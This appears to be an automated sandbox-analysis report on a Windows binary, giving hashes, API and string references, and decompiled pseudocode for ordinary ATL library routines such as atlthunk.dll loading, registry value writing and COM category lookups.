Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: DecodePointer$LibraryLoad
String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
API String ID: 1423960858-1745123996
Opcode ID: 2800825c598b0bc45ce4834943a54fc295d4ef147850a21eb929f5b546ffe5bc
Instruction ID: 8116135af4986d0c33133fcee2f37e0c506ccaa3eab644ff0534f1691dfbf416
Opcode Fuzzy Hash: 2800825c598b0bc45ce4834943a54fc295d4ef147850a21eb929f5b546ffe5bc
Instruction Fuzzy Hash: FE01C030A81301BBDA216715ACCABDA3F545F11744F040050BC157B2E3EFA28B0ADAA6

Uniqueness

Uniqueness Score: -1.00%

Function 00CBC7E8, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58
libraryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00CBC7E8(void* __ecx, intOrPtr* _a4) {
				void* _v8;
				struct HINSTANCE__* _t4;
				intOrPtr* _t5;
				intOrPtr* _t11;

				if( *0xe39104 == 0) {
					_t4 = LoadLibraryExA("atlthunk.dll", 0, 0x800);
					_t15 = _t4;
					if(_t4 == 0 || E00CBC94B(_t15, "AtlThunk_AllocateData", 0xe390f4) == 0 || E00CBC94B(_t15, "AtlThunk_InitData", 0xe390f8) == 0 || E00CBC94B(_t15, "AtlThunk_DataToCode", 0xe390fc) == 0 || E00CBC94B(_t15, "AtlThunk_FreeData", 0xe39100) == 0) {
						_t5 = 0;
					} else {
						asm("lock or [eax], ecx");
						_t5 = _a4;
						 *0xe39104 = 1;
						__imp__DecodePointer( *_t5);
					}
					return _t5;
				} else {
					_t11 = _a4;
					__imp__DecodePointer( *_t11);
					return _t11;
				}
			}

0x00cbc7f3
0x00cbc80f
0x00cbc815
0x00cbc819
0x00cbc893
0x00cbc877
0x00cbc87c
0x00cbc87f
0x00cbc882
0x00cbc88b
0x00cbc88b
0x00cbc897
0x00cbc7f5
0x00cbc7f5
0x00cbc7fa
0x00cbc801
0x00cbc801

APIs

DecodePointer.KERNEL32(?,C0000001,?,00CBCC0A,00E39100,?,C0000001,?,00CB7DF7,?), ref: 00CBC7FA
LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,C0000001,?,00CBCC0A,00E39100,?,C0000001,?,00CB7DF7,?), ref: 00CBC80F
DecodePointer.KERNEL32(?), ref: 00CBC88B

Strings

AtlThunk_DataToCode, xrefs: 00CBC84E
atlthunk.dll, xrefs: 00CBC80A
AtlThunk_AllocateData, xrefs: 00CBC820
AtlThunk_InitData, xrefs: 00CBC837
AtlThunk_FreeData, xrefs: 00CBC865

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: DecodePointer$LibraryLoad
String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
API String ID: 1423960858-1745123996
Opcode ID: 2800825c598b0bc45ce4834943a54fc295d4ef147850a21eb929f5b546ffe5bc
Instruction ID: 00b9b81c23a0d8b140fc071eb3bf8c97a3d95d3f13037fc02debd70decbb0913
Opcode Fuzzy Hash: 2800825c598b0bc45ce4834943a54fc295d4ef147850a21eb929f5b546ffe5bc
Instruction Fuzzy Hash: 5D018071A41711BADB216715AC8BBDA3F555F01744F0440A0FC49772E3EBE68B08D6A6

Uniqueness

Uniqueness Score: -1.00%

Function 00CBC738, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58
libraryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00CBC738(void* __ecx, intOrPtr* _a4) {
				void* _v8;
				struct HINSTANCE__* _t4;
				intOrPtr* _t5;
				intOrPtr* _t11;

				if( *0xe39104 == 0) {
					_t4 = LoadLibraryExA("atlthunk.dll", 0, 0x800);
					_t15 = _t4;
					if(_t4 == 0 || E00CBC94B(_t15, "AtlThunk_AllocateData", 0xe390f4) == 0 || E00CBC94B(_t15, "AtlThunk_InitData", 0xe390f8) == 0 || E00CBC94B(_t15, "AtlThunk_DataToCode", 0xe390fc) == 0 || E00CBC94B(_t15, "AtlThunk_FreeData", 0xe39100) == 0) {
						_t5 = 0;
					} else {
						asm("lock or [eax], ecx");
						_t5 = _a4;
						 *0xe39104 = 1;
						__imp__DecodePointer( *_t5);
					}
					return _t5;
				} else {
					_t11 = _a4;
					__imp__DecodePointer( *_t11);
					return _t11;
				}
			}

0x00cbc743
0x00cbc75f
0x00cbc765
0x00cbc769
0x00cbc7e3
0x00cbc7c7
0x00cbc7cc
0x00cbc7cf
0x00cbc7d2
0x00cbc7db
0x00cbc7db
0x00cbc7e7
0x00cbc745
0x00cbc745
0x00cbc74a
0x00cbc751
0x00cbc751

APIs

DecodePointer.KERNEL32(?,?,?,00CBCB59,00E390F4,?,?,00CB5090), ref: 00CBC74A
LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,00000000,?,?,00CBCB59,00E390F4,?,?,00CB5090), ref: 00CBC75F
DecodePointer.KERNEL32(?), ref: 00CBC7DB

Strings

AtlThunk_DataToCode, xrefs: 00CBC79E
atlthunk.dll, xrefs: 00CBC75A
AtlThunk_AllocateData, xrefs: 00CBC770
AtlThunk_InitData, xrefs: 00CBC787
AtlThunk_FreeData, xrefs: 00CBC7B5

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: DecodePointer$LibraryLoad
String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
API String ID: 1423960858-1745123996
Opcode ID: 2800825c598b0bc45ce4834943a54fc295d4ef147850a21eb929f5b546ffe5bc
Instruction ID: e4cfaa48d1010dc8f186e2c8f573ce951d196b5255876b4e4c6bbdc4855346e8
Opcode Fuzzy Hash: 2800825c598b0bc45ce4834943a54fc295d4ef147850a21eb929f5b546ffe5bc
Instruction Fuzzy Hash: B801C032A41302BBDA216715ACCABDA3F485F01744F040050FC05B72E3EFA28B08DAA6

Uniqueness

Uniqueness Score: -1.00%

Function 00CB3258, Relevance: 13.8, APIs: 9, Instructions: 308
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00CB3258(void* __ebx, char __ecx, void* __edi, void* __esi, void** _a4, char* _a8, intOrPtr _a12) {
				int _v8;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				char _v4120;
				char _v4376;
				char* _v4380;
				char _v4384;
				char* _v4388;
				char* _v4392;
				void** _v4396;
				char _v4400;
				char _v4404;
				intOrPtr _v4408;
				void* _v4424;
				void* __ebp;
				signed int _t87;
				signed int _t88;
				CHAR* _t97;
				CHAR* _t99;
				CHAR* _t102;
				void* _t103;
				CHAR* _t105;
				signed char _t107;
				signed char _t115;
				CHAR* _t120;
				char* _t123;
				CHAR* _t124;
				intOrPtr _t126;
				CHAR* _t127;
				void* _t140;
				CHAR* _t145;
				CHAR* _t146;
				CHAR* _t148;
				char _t149;
				int _t153;
				char* _t155;
				intOrPtr _t163;
				void* _t173;
				char _t188;
				unsigned int* _t189;
				char _t190;
				CHAR* _t199;
				signed int _t200;
				CHAR* _t204;
				CHAR* _t205;
				int _t210;
				CHAR* _t212;
				char* _t213;
				signed int _t214;
				intOrPtr _t215;
				intOrPtr _t218;

				_push(0xffffffff);
				_push(0xcfcb30);
				_push( *[fs:0x0]);
				_push(__ecx);
				E00CBF140();
				_t87 =  *0xd0f014; // 0xbb5e653b
				_t88 = _t87 ^ _t214;
				_v24 = _t88;
				_push(_t88);
				 *[fs:0x0] =  &_v16;
				_v20 = _t215;
				_v4400 = __ecx;
				_t153 = 0;
				_t197 = _a4;
				_t207 = _a8;
				_v4408 = _a12;
				_v4384 = __ecx;
				_v4396 = _a4;
				_v4392 = _a8;
				_v4388 = 0;
				if(E00CB314F(__ecx,  &_v4120) >= 0) {
					_t189 =  &_v4388;
					if(E00CB3023( &_v4120, _t189) != 0) {
						E00CB3129(_v4400);
						_t163 = _v4400;
						_t97 = E00CB314F(_t163,  &_v4120);
						__eflags = _t97;
						if(_t97 >= 0) {
							_t99 = (_v4388 & 0x0000ffff) - 8;
							__eflags = _t99;
							if(_t99 == 0) {
								_push(_t163);
								_t199 = E00CB270E(_t197, _t207,  &_v4120);
								goto L54;
							} else {
								_t105 = _t99 - 9;
								__eflags = _t105;
								if(_t105 == 0) {
									_t107 = E00CDBFC0( &_v4120);
									_v4388 = _t107;
									__eflags = _t107 & 0x00000001;
									if((_t107 & 0x00000001) == 0) {
										asm("cdq");
										_v4380 = 0;
										_t210 = _t107 - _t189 >> 1;
										_v4404 = _t210;
										_v8 = 4;
										_v8 = 5;
										E00CB9743( &_v4380, _t210);
										__eflags = _v4380;
										if(_v4380 != 0) {
											E00CC1E00(_t197, _v4380, 0, _t210);
											_v4384 = 0;
											__eflags = _v4388;
											_t190 = 0;
											if(_v4388 > 0) {
												_t155 = _v4388;
												do {
													_t200 = _t190;
													__eflags = _t200;
													if(_t200 < 0) {
														_t200 = _t200 + 1;
														__eflags = _t200;
													}
													_t115 = E00CB3083( *((intOrPtr*)(_t214 + _t190 - 0x1014)));
													_t173 = 4;
													_v4380[_t200 >> 1] = _v4380[_t200 >> 1] | _t115 << _t173 - ((_t190 & 0x00000001) << 0x00000002);
													_t190 = _v4384 + 1;
													_v4384 = _t190;
													__eflags = _t190 - _t155;
												} while (_t190 < _t155);
												_t210 = _v4404;
												_t153 = 0;
												__eflags = 0;
											}
											_t199 = RegSetValueExA( *_v4396, _v4392, _t153, 3, _v4380, _t210);
											__eflags = _v4380 -  &_v4376;
											if(_v4380 !=  &_v4376) {
												E00CBA380( &_v4380);
											}
											goto L54;
										} else {
											E00CBA380( &_v4380);
											goto L41;
										}
									} else {
										L41:
									}
								} else {
									_t120 = _t105;
									__eflags = _t120;
									if(_t120 == 0) {
										_t212 = 0;
										_v4384 = 0;
										_v8 = 3;
										_t123 = E00CDBFC0( &_v4120) + 1;
										_t194 = _t123;
										_v4388 = _t123;
										_t124 = E00CB1160( &_v4388, _t123);
										_t218 = _t215 + 4;
										__eflags = _t124;
										if(_t124 < 0) {
											L33:
										} else {
											_t202 = _v4388;
											__eflags = _v4388 - 0x400;
											if(__eflags > 0) {
												L27:
												_t126 = E00CB9AD3( &_v4384, _t194, __eflags, _t202);
												_t212 = _v4384;
											} else {
												__eflags = E00CB11E1(_t202, __eflags);
												if(__eflags == 0) {
													goto L27;
												} else {
													E00CBEB70();
													_v20 = _t218;
													_t126 = _t218;
												}
											}
											_t127 = E00CB1255(_t126,  &_v4120, _t202 >> 1, 3);
											__eflags = _t127;
											if(_t127 == 0) {
												while(1) {
													__eflags = _t212;
													if(_t212 == 0) {
														goto L33;
													}
													_t212 =  *_t212;
													E00CDC163(_t212);
												}
												goto L33;
											} else {
												__imp__#277(_t127, _t153, _t153,  &_v4404);
												_t204 = _t127;
												__eflags = _t204;
												if(_t204 < 0) {
													while(1) {
														__eflags = _t212;
														if(_t212 == 0) {
															break;
														}
														_t212 =  *_t212;
														E00CDC163(_t212);
													}
												} else {
													_v4384 = _v4404;
													_t199 = RegSetValueExA( *_v4396, _v4392, _t153, 4,  &_v4384, 4);
													while(1) {
														__eflags = _t212;
														if(_t212 == 0) {
															break;
														}
														_t212 =  *_t212;
														E00CDC163(_t212);
													}
													goto L54;
												}
											}
										}
									} else {
										__eflags = _t120 != 0x3ff5;
										if(_t120 != 0x3ff5) {
											L56:
											_t102 = E00CB314F(_v4400, _v4408);
											__eflags = _t102;
											_t167 =  <  ? _t102 : 0;
											_t103 =  <  ? _t102 : 0;
										} else {
											_t140 = E00CDBFC0( &_v4120);
											_v4380 = 0;
											_v8 = 0;
											_v8 = 1;
											E00CB9783( &_v4380, _t140 + 2);
											_t213 = _v4380;
											__eflags = _t213;
											if(_t213 == 0) {
												_t199 = 0xe;
											} else {
												__eflags = _v4120;
												_t205 =  &_v4120;
												if(_v4120 != 0) {
													do {
														_t146 = CharNextA(_t205);
														_t188 =  *_t205;
														__eflags = _t188 - 0x5c;
														if(_t188 != 0x5c) {
															L14:
															 *_t213 = _t188;
															_t148 = IsDBCSLeadByte( *_t205 & 0x000000ff);
															__eflags = _t148;
															if(_t148 == 0) {
																L17:
																_t205 =  &(_t205[1]);
																__eflags = _t205;
																goto L18;
															} else {
																_t213 =  &(_t213[1]);
																_t205 =  &(_t205[1]);
																_t149 =  *_t205;
																__eflags = _t149;
																if(_t149 != 0) {
																	 *_t213 = _t149;
																	goto L17;
																}
															}
														} else {
															__eflags =  *_t146 - 0x30;
															if( *_t146 != 0x30) {
																goto L14;
															} else {
																 *_t213 = _t153;
																_t205 = CharNextA(_t146);
																goto L18;
															}
														}
														goto L19;
														L18:
														_t213 =  &(_t213[1]);
														__eflags =  *_t205;
													} while ( *_t205 != 0);
												}
												L19:
												 *_t213 = 0;
												_t145 = E00CB2741(_v4392, _v4380);
												_t213 = _v4380;
												_t199 = _t145;
											}
											__eflags = _t213 -  &_v4376;
											if(_t213 !=  &_v4376) {
												E00CBA3AE( &_v4380);
											}
											L54:
											__eflags = _t199;
											if(_t199 == 0) {
												goto L56;
											} else {
												E00CB15E4(_t199);
											}
										}
									}
								}
							}
						}
					} else {
					}
				}
				 *[fs:0x0] = _v16;
				return E00CBDC11(_v24 ^ _t214);
			}

0x00cb325b
0x00cb325d
0x00cb3268
0x00cb3269
0x00cb326f
0x00cb3274
0x00cb3279
0x00cb327b
0x00cb3281
0x00cb3285
0x00cb328b
0x00cb328e
0x00cb3297
0x00cb3299
0x00cb329c
0x00cb329f
0x00cb32ac
0x00cb32b2
0x00cb32b8
0x00cb32be
0x00cb32cb
0x00cb32d1
0x00cb32e4
0x00cb32f6
0x00cb32fb
0x00cb3308
0x00cb330d
0x00cb330f
0x00cb331c
0x00cb331c
0x00cb331f
0x00cb3654
0x00cb3664
0x00000000
0x00cb3325
0x00cb3325
0x00cb3325
0x00cb3328
0x00cb3536
0x00cb353b
0x00cb3542
0x00cb3544
0x00cb3550
0x00cb3553
0x00cb355b
0x00cb355d
0x00cb3563
0x00cb3571
0x00cb3575
0x00cb3596
0x00cb359d
0x00cb35b4
0x00cb35bc
0x00cb35c2
0x00cb35c9
0x00cb35cb
0x00cb35cd
0x00cb35d3
0x00cb35d3
0x00cb35d5
0x00cb35d7
0x00cb35d9
0x00cb35d9
0x00cb35d9
0x00cb35eb
0x00cb35f8
0x00cb3603
0x00cb3606
0x00cb3607
0x00cb360d
0x00cb360d
0x00cb3611
0x00cb3617
0x00cb3617
0x00cb3617
0x00cb3637
0x00cb363f
0x00cb3645
0x00cb364d
0x00cb364d
0x00000000
0x00cb359f
0x00cb35a5
0x00000000
0x00cb35a5
0x00cb3546
0x00cb3546
0x00cb3546
0x00cb332e
0x00cb332f
0x00cb332f
0x00cb3332
0x00cb3423
0x00cb3425
0x00cb3431
0x00cb343e
0x00cb3445
0x00cb3447
0x00cb344d
0x00cb3452
0x00cb3455
0x00cb3457
0x00cb34ff
0x00cb345d
0x00cb345d
0x00cb3463
0x00cb3469
0x00cb3484
0x00cb348b
0x00cb3490
0x00cb346b
0x00cb3472
0x00cb3474
0x00000000
0x00cb3476
0x00cb3478
0x00cb347d
0x00cb3480
0x00cb3480
0x00cb3474
0x00cb34a3
0x00cb34a8
0x00cb34aa
0x00cb34fb
0x00cb34fb
0x00cb34fd
0x00000000
0x00000000
0x00cb34f3
0x00cb34f5
0x00cb34fa
0x00000000
0x00cb34ac
0x00cb34b6
0x00cb34bc
0x00cb34be
0x00cb34c0
0x00cb3512
0x00cb3512
0x00cb3514
0x00000000
0x00000000
0x00cb350a
0x00cb350c
0x00cb3511
0x00cb34c2
0x00cb34ca
0x00cb34ee
0x00cb3526
0x00cb3526
0x00cb3528
0x00000000
0x00000000
0x00cb351e
0x00cb3520
0x00cb3525
0x00000000
0x00cb352a
0x00cb34c0
0x00cb34aa
0x00cb3338
0x00cb3338
0x00cb333d
0x00cb3673
0x00cb367f
0x00cb3686
0x00cb3688
0x00cb368b
0x00cb3343
0x00cb334a
0x00cb3353
0x00cb3359
0x00cb3363
0x00cb3367
0x00cb3382
0x00cb3388
0x00cb338a
0x00cb3404
0x00cb338c
0x00cb338c
0x00cb3393
0x00cb3399
0x00cb339b
0x00cb339c
0x00cb33a2
0x00cb33a4
0x00cb33a7
0x00cb33bb
0x00cb33bb
0x00cb33c1
0x00cb33c7
0x00cb33c9
0x00cb33d5
0x00cb33d5
0x00cb33d5
0x00000000
0x00cb33cb
0x00cb33cb
0x00cb33cc
0x00cb33cd
0x00cb33cf
0x00cb33d1
0x00cb33d3
0x00000000
0x00cb33d3
0x00cb33d1
0x00cb33a9
0x00cb33a9
0x00cb33ac
0x00000000
0x00cb33ae
0x00cb33af
0x00cb33b7
0x00000000
0x00cb33b7
0x00cb33ac
0x00000000
0x00cb33d6
0x00cb33d6
0x00cb33d7
0x00cb33d7
0x00cb339b
0x00cb33dc
0x00cb33e2
0x00cb33f3
0x00cb33f8
0x00cb33fe
0x00cb33fe
0x00cb340b
0x00cb340d
0x00cb3419
0x00cb3419
0x00cb3666
0x00cb3666
0x00cb3668
0x00000000
0x00cb366a
0x00cb366c
0x00cb366c
0x00cb3668
0x00cb333d
0x00cb3332
0x00cb3328
0x00cb331f
0x00cb32e6
0x00cb32e6
0x00cb32e4
0x00cb3696
0x00cb36ac

APIs

Part of subcall function 00CB314F: CharNextA.USER32 ref: 00CB3175
Part of subcall function 00CB314F: CharNextA.USER32 ref: 00CB31E9

Part of subcall function 00CB3023: lstrcmpiA.KERNEL32(?,00D07888,?,?,00000000,00CB32E2,BB5E653B,?,?,?,?,?,00CFCB30,000000FF), ref: 00CB3036

_strlen.LIBCMT ref: 00CB334A
CharNextA.USER32(00000000), ref: 00CB339C
CharNextA.USER32(00000000), ref: 00CB33B1

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$_strlenlstrcmpi
String ID:
API String ID: 214070177-0
Opcode ID: 4a28aabd75bb2ad7f60de35c70fd1871802953979cd0229e76432ac4a2c14298
Instruction ID: 5c288b44f826c3278f6ee3d4c9629faa346eccf85585c57c3d621d5b738fcd88
Opcode Fuzzy Hash: 4a28aabd75bb2ad7f60de35c70fd1871802953979cd0229e76432ac4a2c14298
Instruction Fuzzy Hash: E3C1B271D001A9ABCB259F28CC41BEDB7B5AF48350F1401DAEB49A3250DB349F85DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00CB45F4, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 268
registrycomCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00CB45F4(void* __ebx, int __ecx, char* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v136;
				char _v264;
				char _v280;
				int _v284;
				char* _v288;
				void* _v292;
				char* _v296;
				char* _v300;
				void* _v304;
				char* _v308;
				char* _v312;
				char _v316;
				void* _v328;
				void* __ebp;
				signed int _t69;
				char* _t71;
				char* _t76;
				char* _t77;
				intOrPtr* _t78;
				intOrPtr* _t81;
				char* _t82;
				char* _t85;
				char* _t86;
				void* _t87;
				char* _t88;
				char* _t100;
				char* _t111;
				long _t115;
				char* _t120;
				char* _t127;
				intOrPtr* _t129;
				intOrPtr _t132;
				intOrPtr _t133;
				char* _t155;
				void* _t159;
				int _t163;
				char* _t165;
				signed int _t166;
				void* _t167;
				void* _t169;

				_t69 =  *0xd0f014; // 0xbb5e653b
				_v8 = _t69 ^ _t166;
				_t155 = __edx;
				_v288 = __edx;
				_t127 = 0;
				_t163 = __ecx;
				_v284 = __ecx;
				_v292 = 0;
				if(__edx == 0 || E00CB10E3(__ecx, 0xcfe6b0) != 0) {
					L3:
					_t71 = _t127;
					goto L4;
				} else {
					_t76 =  &_v292;
					__imp__CoCreateInstance(0xcffff0, 0, 1, 0xd07d38, _t76);
					if(_t76 >= 0) {
						while(1) {
							_t77 =  *_t155;
							__eflags = _t77;
							if(_t77 == 0) {
								break;
							}
							_push( &_v280);
							_push(1);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							__eflags = _a4 - _t127;
							if(_a4 == _t127) {
								_t163 = _v284;
								__eflags = _t77 - 1;
								_t78 = _v292;
								_push(_t163);
								_push(_t78);
								_t132 =  *_t78;
								if(_t77 != 1) {
									 *((intOrPtr*)(_t132 + 0x20))();
								} else {
									 *((intOrPtr*)(_t132 + 0x18))();
								}
								L17:
								_t155 =  &(_v288[8]);
								__eflags = _t155;
								_v288 = _t155;
								continue;
							}
							_push(_v284);
							__eflags = _t77 - 1;
							_t81 = _v292;
							_push(_t81);
							_t133 =  *_t81;
							if(_t77 != 1) {
								_t71 =  *((intOrPtr*)(_t133 + 0x1c))();
							} else {
								_t71 =  *((intOrPtr*)(_t133 + 0x14))();
							}
							__eflags = _t71;
							if(_t71 < 0) {
								L4:
								_t127 = _t71;
								L5:
								_t129 = _v292;
								if(_t129 != 0) {
									 *((intOrPtr*)( *_t129 + 8))(_t129);
								}
								return E00CBDC11(_v8 ^ _t166);
							} else {
								_t163 = _v284;
								goto L17;
							}
						}
						__eflags = _a4 - _t127;
						if(_a4 != _t127) {
							goto L5;
						}
						_t82 =  &_v264;
						__imp__StringFromGUID2(_t163, _t82, 0x40);
						__eflags = _t82;
						if(_t82 != 0) {
							_t165 = _t127;
							_v284 = _t165;
							_t85 = E00CDCACF( &_v264) + 1;
							_t152 = _t85;
							_v288 = _t85;
							_t86 = E00CB1160( &_v288, _t85);
							_t169 = _t167 + 4;
							__eflags = _t86;
							if(_t86 < 0) {
								goto L5;
							}
							_t158 = _v288;
							__eflags = _v288 - 0x400;
							if(__eflags > 0) {
								L26:
								_t87 = E00CB9AD3( &_v284, _t152, __eflags, _t158);
								_t165 = _v284;
								L27:
								_t153 =  &_v264;
								_t88 = E00CB1288(_t87,  &_v264, _t158, 3);
								_v288 = _t88;
								__eflags = _t88;
								if(_t88 != 0) {
									_t159 = 0x80;
									E00CB1447( &_v264, E00CDBF5B( &_v136, 0x80, "CLSID\\"));
									E00CB1447( &_v264, E00CDCE10( &_v136, 0x80, _v288));
									E00CB1447(_t153, E00CDCE10( &_v136, 0x80, "\\Required Categories"));
									_v312 = _t127;
									_v308 = _t127;
									_v304 = _t127;
									_v316 = 0x80000000;
									_v300 = _t127;
									_v296 = _t127;
									_v284 = _t127;
									_t100 = E00CB2696( &_v304, 0x80000000,  &_v136, 0x20019);
									__eflags = _t100;
									if(_t100 == 0) {
										_t120 = RegQueryInfoKeyA(_v304, _t127, _t127, _t127,  &_v284, _t127, _t127, _t127, _t127, _t127, _t127, _t127);
										E00CB261B( &_v304);
										__eflags = _t120;
										if(_t120 == 0) {
											__eflags = _v284 - _t127;
											if(_v284 == _t127) {
												E00CB2590( &_v316,  &_v136);
											}
										}
										_t159 = 0x80;
									}
									E00CB1447(_t153, E00CDBF5B( &_v136, _t159, "CLSID\\"));
									E00CB1447(_t153, E00CDCE10( &_v136, _t159, _v288));
									E00CB1447(_t153, E00CDCE10( &_v136, _t159, "\\Implemented Categories"));
									_t111 = E00CB2696( &_v304, 0x80000000,  &_v136, 0x20019);
									__eflags = _t111;
									if(_t111 == 0) {
										_t115 = RegQueryInfoKeyA(_v304, _t127, _t127, _t127,  &_v284, _t127, _t127, _t127, _t127, _t127, _t127, _t127);
										E00CB261B( &_v304);
										__eflags = _t115;
										if(_t115 == 0) {
											__eflags = _v284 - _t127;
											if(_v284 == _t127) {
												E00CB2590( &_v316,  &_v136);
											}
										}
									}
									E00CB261B( &_v304);
									E00CB261B( &_v316);
								}
								while(1) {
									__eflags = _t165;
									if(_t165 == 0) {
										break;
									}
									_t165 =  *_t165;
									E00CDC163(_t165);
								}
								goto L5;
							}
							__eflags = E00CB11E1(_t158, __eflags);
							if(__eflags == 0) {
								goto L26;
							}
							E00CBEB70();
							_t87 = _t169;
							goto L27;
						} else {
							_t71 = 0xd;
							goto L4;
						}
					}
					goto L3;
				}
			}

0x00cb45fd
0x00cb4604
0x00cb460a
0x00cb460c
0x00cb4612
0x00cb4614
0x00cb4616
0x00cb461c
0x00cb4624
0x00cb4656
0x00cb4656
0x00000000
0x00cb4634
0x00cb4634
0x00cb4648
0x00cb4650
0x00cb46f2
0x00cb46f2
0x00cb46f4
0x00cb46f6
0x00000000
0x00000000
0x00cb4692
0x00cb4693
0x00cb4695
0x00cb4696
0x00cb4697
0x00cb4698
0x00cb4699
0x00cb469c
0x00cb46c6
0x00cb46cc
0x00cb46cf
0x00cb46d5
0x00cb46d6
0x00cb46d7
0x00cb46d9
0x00cb46e0
0x00cb46db
0x00cb46db
0x00cb46db
0x00cb46e3
0x00cb46e9
0x00cb46e9
0x00cb46ec
0x00000000
0x00cb46ec
0x00cb469e
0x00cb46a4
0x00cb46a7
0x00cb46ad
0x00cb46ae
0x00cb46b0
0x00cb46b7
0x00cb46b2
0x00cb46b2
0x00cb46b2
0x00cb46ba
0x00cb46bc
0x00cb4658
0x00cb4658
0x00cb465a
0x00cb465a
0x00cb4662
0x00cb4667
0x00cb4667
0x00cb4680
0x00cb46be
0x00cb46be
0x00000000
0x00cb46be
0x00cb46bc
0x00cb46f8
0x00cb46fb
0x00000000
0x00000000
0x00cb4703
0x00cb470b
0x00cb4711
0x00cb4713
0x00cb4723
0x00cb4726
0x00cb4731
0x00cb4738
0x00cb473a
0x00cb4740
0x00cb4745
0x00cb4748
0x00cb474a
0x00000000
0x00000000
0x00cb4750
0x00cb4756
0x00cb475c
0x00cb4774
0x00cb477b
0x00cb4780
0x00cb4786
0x00cb4789
0x00cb4791
0x00cb4796
0x00cb479c
0x00cb479e
0x00cb47a9
0x00cb47bc
0x00cb47d5
0x00cb47ed
0x00cb47f5
0x00cb4801
0x00cb480c
0x00cb4812
0x00cb4825
0x00cb482b
0x00cb4831
0x00cb4837
0x00cb483c
0x00cb483e
0x00cb4857
0x00cb4865
0x00cb486a
0x00cb486c
0x00cb486e
0x00cb4874
0x00cb4883
0x00cb4883
0x00cb4874
0x00cb4888
0x00cb4888
0x00cb48a0
0x00cb48b9
0x00cb48d1
0x00cb48f0
0x00cb48f5
0x00cb48f7
0x00cb4910
0x00cb491e
0x00cb4923
0x00cb4925
0x00cb4927
0x00cb492d
0x00cb493c
0x00cb493c
0x00cb492d
0x00cb4925
0x00cb4947
0x00cb4952
0x00cb4952
0x00cb4962
0x00cb4962
0x00cb4964
0x00000000
0x00000000
0x00cb495a
0x00cb495c
0x00cb4961
0x00000000
0x00cb4966
0x00cb4765
0x00cb4767
0x00000000
0x00000000
0x00cb476b
0x00cb4770
0x00000000
0x00cb4715
0x00cb4717
0x00000000
0x00cb4717
0x00cb4713
0x00000000
0x00cb4650

APIs

CoCreateInstance.OLE32(00CFFFF0,00000000,00000001,00D07D38,?), ref: 00CB4648
StringFromGUID2.OLE32(?,?,00000040), ref: 00CB470B
RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CB4857
RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CB4910

Strings

CLSID\, xrefs: 00CB47A4, 00CB488D
\Implemented Categories, xrefs: 00CB48BE
\Required Categories, xrefs: 00CB47DA

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
